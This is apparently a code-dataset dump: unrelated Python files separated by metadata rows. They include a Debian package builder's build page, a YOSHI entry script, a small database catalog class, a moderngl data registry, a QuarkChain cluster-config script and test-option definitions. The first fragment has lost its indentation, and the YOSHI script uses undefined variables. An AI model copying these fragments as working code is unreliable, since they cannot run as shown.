def GetSaveData(self):
build_list = []
options = (
self.chk_md5,
self.chk_rmstage,
self.chk_lint,
)
for O in options:
if O.GetValue():
build_list.append(u'1')
else:
build_list.append(u'0')
if self.chk_strip.GetValue():
build_list.append(u'strip')
return u'<<BUILD>>\n{}\n<</BUILD>>'.format(u'\n'.join(build_list))
## Installs the built .deb package onto the system
#
# Uses the system's package installer:
# gdebi if available or dpkg
#
# Shows a success dialog if installed. Otherwise shows an
# error dialog.
# \param package
# \b \e unicode|str : Path to package to be installed
def InstallPackage(self, package):
system_installer = GetSystemInstaller()
if not system_installer:
ShowErrorDialog(
GT(u'Cannot install package'),
GT(u'A compatible package manager could not be found on the system'),
__name__,
warn=True
)
return
Logger.Info(__name__, GT(u'Attempting to install package: {}').format(package))
Logger.Info(__name__, GT(u'Installing with {}').format(system_installer))
install_cmd = (system_installer, package,)
wx.Yield()
# FIXME: Use ExecuteCommand here
install_output = subprocess.Popen(install_cmd)
# Command appears to not have been executed correctly
if install_output == None:
ShowErrorDialog(
GT(u'Could not install package: {}'),
GT(u'An unknown error occurred'),
__name__
)
return
# Command executed but did not return success code
if install_output.returncode:
err_details = (
GT(u'Process returned code {}').format(install_output.returncode),
GT(u'Command executed: {}').format(u' '.join(install_cmd)),
)
ShowErrorDialog(
GT(u'An error occurred during installation'),
u'\n'.join(err_details),
__name__
)
return
## TODO: Doxygen
def OnBuild(self, event=None):
# Build preparation
ret_code, build_prep = self.BuildPrep()
if ret_code == dbrerrno.ECNCLD:
return
if ret_code == dbrerrno.FEMPTY:
err_dia = DetailedMessageDialog(GetMainWindow(), GT(u'Cannot Continue'), ICON_EXCLAMATION,
text=u'{}\n{}'.format(GT(u'One of the required fields is empty:'), build_prep))
err_dia.ShowModal()
err_dia.Destroy()
return
if ret_code == dbrerrno.SUCCESS:
task_list, build_path, filename = build_prep
# Actual build
ret_code, result = self.Build(task_list, build_path, filename)
# FIXME: Check .deb package timestamp to confirm build success
if ret_code == dbrerrno.SUCCESS:
DetailedMessageDialog(GetMainWindow(), GT(u'Success'), ICON_INFORMATION,
text=GT(u'Package created successfully')).ShowModal()
# Installing the package
if FieldEnabled(self.chk_install) and self.chk_install.GetValue():
self.InstallPackage(result)
return
if result:
ShowErrorDialog(GT(u'Package build failed'), result)
else:
ShowErrorDialog(GT(u'Package build failed with unknown error'))
return
if build_prep:
ShowErrorDialog(GT(u'Build preparation failed'), build_prep)
else:
ShowErrorDialog(GT(u'Build preparation failed with unknown error'))
## TODO: Doxygen
#
# TODO: Show warning dialog that this could take a while
# TODO: Add cancel option to progress dialog
# FIXME: List should be cached so no need for re-scanning
def OnSetLintOverrides(self, event=None):
Logger.Debug(__name__, GT(u'Setting Lintian overrides...'))
lintian_tags_file = u'{}/data/lintian/tags'.format(PATH_app)
if not os.path.isfile(lintian_tags_file):
Logger.Error(__name__, u'Lintian tags file is missing: {}'.format(lintian_tags_file))
return False
lint_tags = RemoveEmptyLines(ReadFile(lintian_tags_file, split=True))
if lint_tags:
Logger.Debug(__name__, u'Lintian tags set')
# DEBUG: Start
if DebugEnabled() and len(lint_tags) > 50:
print(u' Reducing tag count to 50 ...')
lint_tags = lint_tags[:50]
Logger.Debug(__name__, u'Processing {} tags'.format(len(lint_tags)))
# DEBUG: End
tag_count = len(lint_tags)
def GetProgressMessage(message, count=tag_count):
return u'{} ({} {})'.format(message, count, GT(u'tags'))
progress = TimedProgressDialog(GetMainWindow(), GT(u'Building Tag List'),
GetProgressMessage(GT(u'Scanning default tags')))
progress.Start()
wx.Yield()
# Create the dialog
overrides_dialog = CheckListDialog(GetMainWindow(), title=GT(u'Lintian Overrides'),
allow_custom=True)
# FIXME: Needs progress dialog
overrides_dialog.InitCheckList(tuple(lint_tags))
progress.SetMessage(GetProgressMessage(GT(u'Setting selected overrides')))
for T in lint_tags:
if T in self.lint_overrides:
overrides_dialog.SetItemCheckedByLabel(T)
self.lint_overrides.remove(T)
progress.SetMessage(GetProgressMessage(GT(u'Adding custom tags'), len(self.lint_overrides)))
# Remaining tags should be custom entries
# FIXME:
if self.lint_overrides:
for T in self.lint_overrides:
overrides_dialog.AddItem(T, True)
progress.Stop()
if overrides_dialog.ShowModal() == wx.ID_OK:
# Remove old overrides
self.lint_overrides = []
for L in overrides_dialog.GetCheckedLabels():
Logger.Debug(__name__, GT(u'Adding Lintian override: {}').format(L))
self.lint_overrides.append(L)
return True
else:
Logger.Debug(__name__, u'Setting lintian tags failed')
return False
## TODO: Doxygen
#
# TODO: Use string names in project file but retain
# compatibility with older projects that use
# integer values.
def Set(self, data):
# ???: Redundant
self.Reset()
build_data = data.split(u'\n')
if GetExecutable(u'md5sum'):
try:
self.chk_md5.SetValue(int(build_data[0]))
except IndexError:
pass
try:
self.chk_rmstage.SetValue(int(build_data[1]))
except IndexError:
pass
if GetExecutable(u'lintian'):
try:
self.chk_lint.SetValue(int(build_data[2]))
except IndexError:
pass
self.chk_strip.SetValue(GetExecutable(u'strip') and u'strip' in build_data)
## TODO: Doxygen
def SetSummary(self, event=None):
pg_scripts = GetPage(pgid.SCRIPTS)
# Make sure the page is not destroyed so no error is thrown
if self:
# Set summary when "Build" page is shown
# Get the file count
files_total = GetPage(pgid.FILES).GetFileCount()
f = GT(u'File Count')
file_count = u'{}: {}'.format(f, files_total)
# Scripts to make
scripts_to_make = []
scripts = ((u'preinst', pg_scripts.chk_preinst),
(u'postinst', pg_scripts.chk_postinst),
(u'prerm', pg_scripts.chk_prerm),
(u'postrm', pg_scripts.chk_postrm))
for script in scripts:
if script[1].IsChecked():
scripts_to_make.append(script[0])
s = GT(u'Scripts')
if len(scripts_to_make):
scripts_to_make = u'{}: {}'.format(s, u', '.join(scripts_to_make))
else:
scripts_to_make = u'{}: 0'.format(s)
self.summary.SetValue(u'\n'.join((file_count, scripts_to_make)))
| 28.251451 | 151 | 0.691736 | 3,995 | 29,212 | 4.900626 | 0.161202 | 0.00996 | 0.00899 | 0.022219 | 0.236541 | 0.17489 | 0.12749 | 0.103637 | 0.088467 | 0.073858 | 0.000068 | 0.006506 | 0.189682 | 29,212 | 1,033 | 152 | 28.2788 | 0.820244 | 0.162844 | 0 | 0.239482 | 0 | 0 | 0.11004 | 0.003253 | 0 | 0 | 0 | 0.000968 | 0 | 0 | null | null | 0.004854 | 0.071197 | null | null | 0.004854 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e6c8ce8afe1fef7a0e2e19b44facdada82817d59 | 311 | py | Python | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 6 | 2017-05-07T09:39:18.000Z | 2021-10-07T01:46:08.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 1 | 2018-01-15T15:31:03.000Z | 2018-01-15T15:31:03.000Z | __main__.py | maelstromdat/YOSHI | 67e5176f24ff12e598025d4250b408da564f53d1 | [
"Apache-2.0"
] | 5 | 2020-02-28T04:16:16.000Z | 2021-04-30T09:35:19.000Z | from YoshiViz import Gui
if __name__ == '__main__':
#file director
gui = Gui.Gui()
"""
report_generator.\
generate_pdf_report(fileDirectory, repositoryName, tempCommunityType)
"""
print('the type of', repositoryName, 'is', tempCommunityType, '\n"check .\YoshiViz\output"')
# File: HW2/dbsys-hw2/Database.py (repo: yliu120/dbsystem, license: Apache-2.0)
import json, io, os, os.path
from Catalog.Schema import DBSchema, DBSchemaEncoder, DBSchemaDecoder
from Query.Plan import PlanBuilder
from Storage.StorageEngine import StorageEngine
class Database:
"""
A top-level database engine class.
For now, this primarily maintains a simple catalog,
mapping relation names to schema objects.
Also, it provides the ability to construct query
plan objects, as well as wrapping the storage layer methods.
"""
checkpointEncoding = "latin1"
checkpointFile = "db.catalog"
def __init__(self, **kwargs):
other = kwargs.get("other", None)
if other:
self.fromOther(other)
else:
storageArgs = {k:v for (k,v) in kwargs.items() \
if k in ["pageSize", "poolSize", "dataDir", "indexDir"]}
self.relationMap = kwargs.get("relations", {})
        self.defaultPageSize = kwargs.get("pageSize", io.DEFAULT_BUFFER_SIZE)
        self.storage = kwargs.get("storage", StorageEngine(**storageArgs))

        checkpointFound = os.path.exists(os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile))
        restoring = "restore" in kwargs
        if not restoring and checkpointFound:
            self.restore()

    def fromOther(self, other):
        self.relationMap = other.relationMap
        self.defaultPageSize = other.defaultPageSize
        self.storage = other.storage

    def close(self):
        if self.storage:
            self.storage.close()

    # Database internal components
    def storageEngine(self):
        return self.storage

    def bufferPool(self):
        return self.storage.bufferPool if self.storage else None

    def fileManager(self):
        return self.storage.fileMgr if self.storage else None

    # User API

    # Catalog methods
    def relations(self):
        return self.relationMap.keys()

    def hasRelation(self, relationName):
        return relationName in self.relationMap

    def relationSchema(self, relationName):
        if relationName in self.relationMap:
            return self.relationMap[relationName]

    # DDL statements
    def createRelation(self, relationName, relationFields):
        if relationName not in self.relationMap:
            schema = DBSchema(relationName, relationFields)
            self.relationMap[relationName] = schema
            self.storage.createRelation(relationName, schema)
            self.checkpoint()
        else:
            raise ValueError("Relation '" + relationName + "' already exists")

    def removeRelation(self, relationName):
        if relationName in self.relationMap:
            del self.relationMap[relationName]
            self.storage.removeRelation(relationName)
            self.checkpoint()
        else:
            raise ValueError("No relation '" + relationName + "' found in database")

    # DML statements

    # Returns a tuple id for the newly inserted data.
    def insertTuple(self, relationName, tupleData):
        if relationName in self.relationMap:
            return self.storage.insertTuple(relationName, tupleData)
        else:
            raise ValueError("Unknown relation '" + relationName + "' while inserting a tuple")

    def deleteTuple(self, tupleId):
        self.storage.deleteTuple(tupleId)

    def updateTuple(self, tupleId, tupleData):
        self.storage.updateTuple(tupleId, tupleData)

    # Queries

    # Returns an empty query builder that can access the current database.
    def query(self):
        return PlanBuilder(db=self)

    # Returns an iterable for query results, after initializing the given plan.
    def processQuery(self, queryPlan):
        return queryPlan.prepare(self)

    # Save the database internals to the data directory.
    def checkpoint(self):
        if self.storage:
            dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile)
            with open(dbcPath, 'w', encoding=Database.checkpointEncoding) as f:
                f.write(self.pack())

    # Load relations and schema from an existing data directory.
    def restore(self):
        if self.storage:
            dbcPath = os.path.join(self.storage.fileMgr.dataDir, Database.checkpointFile)
            with open(dbcPath, 'r', encoding=Database.checkpointEncoding) as f:
                other = Database.unpack(f.read(), self.storage)
                self.fromOther(other)

    # Database schema catalog serialization
    def pack(self):
        if self.relationMap is not None:
            return json.dumps([self.relationMap, self.defaultPageSize], cls=DBSchemaEncoder)

    @classmethod
    def unpack(cls, buffer, storageEngine):
        (relationMap, pageSize) = json.loads(buffer, cls=DBSchemaDecoder)
        return cls(relations=relationMap, pageSize=pageSize, storage=storageEngine, restore=True)


if __name__ == "__main__":
    import doctest
    doctest.testmod()
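The `checkpoint`/`restore` pair above round-trips the schema catalog through a JSON file in the data directory. A minimal standalone sketch of that round-trip pattern, with hypothetical names (`checkpoint`, `restore`) and a plain dict catalog instead of the `DBSchema` encoder/decoder used above:

```python
import json
import os
import tempfile

def checkpoint(path, catalog, page_size):
    # Serialize the catalog and page size as a JSON pair, as pack() does above.
    with open(path, "w", encoding="utf-8") as f:
        f.write(json.dumps([catalog, page_size]))

def restore(path):
    # Read the pair back; a real restore would rebuild schema objects here.
    with open(path, "r", encoding="utf-8") as f:
        catalog, page_size = json.loads(f.read())
    return catalog, page_size

# Round-trip a toy catalog through a temporary checkpoint file.
with tempfile.TemporaryDirectory() as d:
    p = os.path.join(d, "db.chk")
    checkpoint(p, {"employee": ["id", "name"]}, 4096)
    catalog, size = restore(p)
```

The two-element JSON list keeps the format trivially versionable: anything the database needs to survive a restart rides alongside the catalog in one atomic write.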
# moderngl_window/resources/data.py (MIT license)
"""
Registry general data files
"""
from typing import Any

from moderngl_window.resources.base import BaseRegistry
from moderngl_window.meta import DataDescription


class DataFiles(BaseRegistry):
    """Registry for requested data files"""

    settings_attr = "DATA_LOADERS"

    def load(self, meta: DataDescription) -> Any:
        """Load data file with the configured loaders.

        Args:
            meta (:py:class:`~moderngl_window.meta.data.DataDescription`): the resource description

        Returns:
            Any: The loaded resource
        """
        return super().load(meta)


data = DataFiles()
# quarkchain/tools/config_slave.py (MIT license)
"""
python config_slave.py 127.0.0.1 38000 38006 127.0.0.2 18999 18002

will generate 4 slave server configs accordingly. will be used in deployment automation to configure a cluster.

usage: python config_slave.py <host1> <port1> <port2> <host2> <port3> ...
"""
import argparse
import collections
import json
import os

FILE = "../../testnet/2/cluster_config_template.json"
if "QKC_CONFIG" in os.environ:
    FILE = os.environ["QKC_CONFIG"]


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "hostports",
        nargs="+",
        metavar="hostports",
        help="Host and ports for slave config",
    )
    args = parser.parse_args()

    abspath = os.path.abspath(__file__)
    dname = os.path.dirname(abspath)
    os.chdir(dname)

    ###############
    # parse hosts and ports to form a slave list
    ###############
    host_port_mapping = collections.defaultdict(list)
    last_host = None
    for host_or_port in args.hostports:  # type: str
        if not host_or_port.isdigit():  # host
            last_host = host_or_port
        else:  # port
            host_port_mapping[last_host].append(host_or_port)

    assert None not in host_port_mapping
    slave_num = sum(len(port_list) for port_list in host_port_mapping.values())
    # make sure the number of slaves is a power of 2
    assert slave_num > 0 and (slave_num & (slave_num - 1) == 0)

    slave_servers, i = [], 0
    for host, port_list in host_port_mapping.items():
        for port in port_list:
            s = {
                "HOST": host,
                "PORT": int(port),
                "ID": "S%d" % i,
                "CHAIN_MASK_LIST": [i | slave_num],
            }
            slave_servers.append(s)
            i += 1

    ###############
    # read config file and substitute with updated slave config
    ###############
    with open(FILE, "r+") as f:
        parsed_config = json.load(f)
        parsed_config["SLAVE_LIST"] = slave_servers
        f.seek(0)
        f.truncate()
        f.write(json.dumps(parsed_config, indent=4))


if __name__ == "__main__":
    main()
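The parsing loop in `main()` groups positional tokens by treating every non-numeric token as the start of a new host and every numeric token as a port for the most recent host, then checks the slave count with the classic `n & (n - 1)` power-of-two test. A self-contained sketch of both pieces, with hypothetical helper names not taken from the module:

```python
import collections

def group_hostports(tokens):
    # Non-numeric tokens start a new host; numeric tokens are ports for it,
    # mirroring the loop over args.hostports in main() above.
    mapping = collections.defaultdict(list)
    last_host = None
    for tok in tokens:
        if not tok.isdigit():
            last_host = tok
        else:
            mapping[last_host].append(int(tok))
    return dict(mapping)

def is_power_of_two(n):
    # n & (n - 1) clears the lowest set bit; only powers of two become 0.
    return n > 0 and (n & (n - 1)) == 0

# The example invocation from the module docstring: two hosts, two ports each.
mapping = group_hostports(["127.0.0.1", "38000", "38006", "127.0.0.2", "18999", "18002"])
slave_num = sum(len(ports) for ports in mapping.values())
```

The power-of-two constraint matters because `CHAIN_MASK_LIST` is built as `i | slave_num`: the slave count acts as a bit prefix over shard IDs, which only partitions the shards evenly when it is a power of two.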
# baseline/ns-vqa/reason/options/test_options.py (MIT license)
from .base_options import BaseOptions

class TestOptions(BaseOptions):
    """Test Option Class"""

    def __init__(self):
        super(TestOptions, self).__init__()
        self.parser.add_argument('--load_checkpoint_path', required=True, type=str, help='checkpoint path')
        self.parser.add_argument('--save_result_path', required=True, type=str, help='save result path')
        self.parser.add_argument('--max_val_samples', default=None, type=int, help='max val data')
        self.parser.add_argument('--batch_size', default=256, type=int, help='batch_size')
        self.is_train = False
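`TestOptions` only extends a parser owned by `BaseOptions`, which is not shown here. A minimal stand-alone sketch of the same argument set on a bare `argparse` parser, to show how the `required`/`default` split behaves (the sample argument values are made up):

```python
import argparse

# Stand-in for the parser that BaseOptions would construct; only the four
# arguments added by TestOptions above are mirrored here.
parser = argparse.ArgumentParser()
parser.add_argument('--load_checkpoint_path', required=True, type=str)
parser.add_argument('--save_result_path', required=True, type=str)
parser.add_argument('--max_val_samples', default=None, type=int)
parser.add_argument('--batch_size', default=256, type=int)

# Only the two required paths must be supplied; the rest fall back to defaults.
opts = parser.parse_args(['--load_checkpoint_path', 'ckpt.pt',
                          '--save_result_path', 'out.json'])
```

Omitting either required path makes `parse_args` exit with an error, while `--max_val_samples` and `--batch_size` silently take their defaults, which is the intended contract for a test-time options class.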